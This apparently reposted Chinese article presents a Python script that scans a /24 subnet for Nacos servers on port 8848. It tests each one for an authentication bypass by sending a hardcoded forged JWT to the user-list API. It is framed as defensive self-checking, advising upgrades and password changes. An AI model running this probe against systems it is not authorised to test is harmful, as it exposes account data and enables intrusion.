基于python的漏洞掃描器
官方確認(rèn),低版本的nacos服務(wù)管理平臺(tái)存在多個(gè)安全漏洞。這些漏洞可能導(dǎo)致配置文件中的敏感信息泄漏或系統(tǒng)被入侵的風(fēng)險(xiǎn)。
今天浩道跟大家分享一個(gè)python腳本,主要用于自動(dòng)檢測(cè)某網(wǎng)段內(nèi)主機(jī)上可能存在的nacos漏洞,可以方便大家對(duì)某網(wǎng)段內(nèi)多臺(tái)主機(jī)進(jìn)行檢測(cè),一起看看吧!
如存在漏洞,建議及時(shí)升級(jí)nacos服務(wù)管理平臺(tái)的版本,并修改默認(rèn)密碼,刪除多余管理賬號(hào)。
nacos.py腳本信息如下,大家可以根據(jù)自己實(shí)際網(wǎng)段修改對(duì)應(yīng)代碼即可。該腳本實(shí)現(xiàn)掃描的是192.168.100.0網(wǎng)段內(nèi)主機(jī)上的nacos漏洞。
import requests import urllib3 import threading import socket urllib3.disable_warnings() # 定義自定義路徑和Header custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2' header = { "User-Agent": "Nacos-Server", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Pragma": "no-cache", "Te": "trailers", "Cache-Control": "no-cache", } # 定義函數(shù),用于發(fā)起GET請(qǐng)求并判斷回顯結(jié)果,每次調(diào)用這個(gè)函數(shù)發(fā)送一個(gè)請(qǐng)求 def send_request(url): full_url = url + custom_path # 拼接完整URL try: response = requests.get(full_url, headers=header, verify=False, timeout=2) if response.status_code == 200 and response.content.find(b"pageNumber") != -1: print(f'{url} 存在nacos身份驗(yàn)證繞過漏洞') else: print(f'{url} 不存在nacos身份驗(yàn)證繞過漏洞') except requests.exceptions.RequestException as e: print(f'{url} 訪問失敗 {e}') # Function to check if port 8848 is open on a given IP address def is_port_open(ip, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) # Set a timeout of 2 seconds for the connection attempt result = sock.connect_ex((ip, port)) sock.close() return result == 0 # Scan the 192.168.100.1 network segment for hosts with port 8848 open nacos_hosts = [] for i in range(1, 256): ip_address = f'192.168.100.{i}' if is_port_open(ip_address, 8848): nacos_hosts.append(ip_address) # Perform Nacos vulnerability check for hosts with port 8848 open if not nacos_hosts: print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.") else: print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}") threads = [] for host in nacos_hosts: t = threading.Thread(target=send_request, args=(f"http://{host}:8848",)) threads.append(t) t.start() # Wait for all threads to complete for t in threads: t.join()
以下針對(duì)三個(gè)網(wǎng)段執(zhí)行腳本,如下圖所示:
責(zé)任編輯:彭菁
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。
舉報(bào)投訴
-
文件
+關(guān)注
關(guān)注
1文章
575瀏覽量
25098 -
代碼
+關(guān)注
關(guān)注
30文章
4874瀏覽量
69932 -
漏洞
+關(guān)注
關(guān)注
0文章
205瀏覽量
15581 -
python
+關(guān)注
關(guān)注
56文章
4821瀏覽量
85763 -
掃描器
+關(guān)注
關(guān)注
0文章
178瀏覽量
12190
原文標(biāo)題:【python實(shí)戰(zhàn)腳本分享】自動(dòng)檢測(cè)nacos漏洞!
文章出處:【微信號(hào):浩道linux,微信公眾號(hào):浩道linux】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
HR3220的無線掃描器用戶手冊(cè)
本手冊(cè)主要向用戶介紹NLS-HR3220系列無線式二維條碼掃描器(以下簡(jiǎn)稱HR32無線掃描器或掃描器)的使用方法。
發(fā)表于 09-20 18:49
?14次下載
干貨:基于指紋識(shí)別的漏洞掃描設(shè)計(jì)方案
漏洞掃描器大家都不陌生,幾乎是每家公司必備的安全產(chǎn)品。幾乎早在快10年前,作為安全乙方,就需要扛著一臺(tái)極光掃描器,到全國(guó)各地去做各種安服。在當(dāng)時(shí)極光掃描器就是一款非常成熟的商業(yè)產(chǎn)品了,
XSS漏洞掃描器工具
XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測(cè)試功能。還可進(jìn)行參數(shù)分析。
市場(chǎng)上可用的十大最佳漏洞掃描工具
OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來掃描服務(wù)器和網(wǎng)絡(luò)設(shè)備。這些掃描
NanoBeacon? BLE掃描器教程
到目前為止,我們已經(jīng)發(fā)布了三個(gè)關(guān)于使用我們新的NanoBeacon? BLE掃描器移動(dòng)應(yīng)用程序的教程。
Android Things I2C地址掃描器
電子發(fā)燒友網(wǎng)站提供《Android Things I2C地址掃描器.zip》資料免費(fèi)下載
發(fā)表于 06-13 17:02
?0次下載
紅光條碼掃描器、固定式掃描器廣泛應(yīng)用于工業(yè)制造領(lǐng)域
隨著科技的不斷進(jìn)步,電子制造業(yè)、汽配行業(yè)、生產(chǎn)流水線等工業(yè)制造領(lǐng)域離不開紅光條碼掃描器。作為專用于掃描條碼、二維碼的掃描器,它在工業(yè)領(lǐng)域中扮演著重要的角色,因?yàn)樗鼈兛梢詭椭髽I(yè)提高生產(chǎn)效率、減少
一款網(wǎng)絡(luò)攝像頭漏洞掃描工具
? 項(xiàng)目地址:https://github.com/jorhelp/Ingram ? 簡(jiǎn)介 主要針對(duì)網(wǎng)絡(luò)攝像頭的漏洞掃描框架,目前已集成海康、大華、宇視、dlink等常見設(shè)備 端口掃描器 我們可以
最常見的網(wǎng)絡(luò)安全12種漏洞掃描類型
數(shù)據(jù)庫(kù)掃描技術(shù)主要用于評(píng)估數(shù)據(jù)庫(kù)系統(tǒng)的安全性,該類型會(huì)全面查找數(shù)據(jù)庫(kù)設(shè)置、訪問控制和存儲(chǔ)數(shù)據(jù)的漏洞,比如不安全的權(quán)限、漏洞注入問題或不安全的設(shè)置。這種掃描器需要經(jīng)常提供用于保護(hù)數(shù)據(jù)庫(kù)和
發(fā)表于 07-12 12:41
?1817次閱讀
網(wǎng)站常見漏洞checklist介紹
在做網(wǎng)站滲透之前除了關(guān)注一些通用漏洞,這些漏洞通常能很容易的利用掃描器掃出,被WAF所防護(hù),然而有一些邏輯漏洞WAF和掃描器就無法發(fā)現(xiàn)了,就
什么是固定式條碼掃描器?固定式掃描器怎么選?
1.產(chǎn)品特性固定式條碼掃描器以其高度的可靠性而聞名。這種設(shè)備的設(shè)計(jì)旨在提供無與倫比的性能,無論是在高速掃描還是長(zhǎng)時(shí)間持續(xù)工作的環(huán)境下。其多種掃描模式使其能夠適應(yīng)各種不同的應(yīng)用環(huán)境,無論是需要快速
嵌入式條碼掃描器的幾種掃描模式
嵌入式條碼掃描器的掃描模式是指其在識(shí)別條碼時(shí)的工作模式,這些模式會(huì)影響到掃描器的使用效果和適用場(chǎng)景。以下是幾種常見的嵌入式條碼掃描器的掃描模
工業(yè)固定式掃描器怎樣用?固定式工業(yè)條碼掃描器解決方案
在現(xiàn)代制造業(yè)和物流領(lǐng)域,條碼掃描技術(shù)已經(jīng)成為提高效率、減少錯(cuò)誤的重要工具。工業(yè)固定式掃描器作為其中一種高效的解決方案,能夠在生產(chǎn)線、倉(cāng)儲(chǔ)和物流管理中發(fā)揮關(guān)鍵作用。本文將探討工業(yè)固定式條碼掃描器
工商網(wǎng)監(jiān)
評(píng)論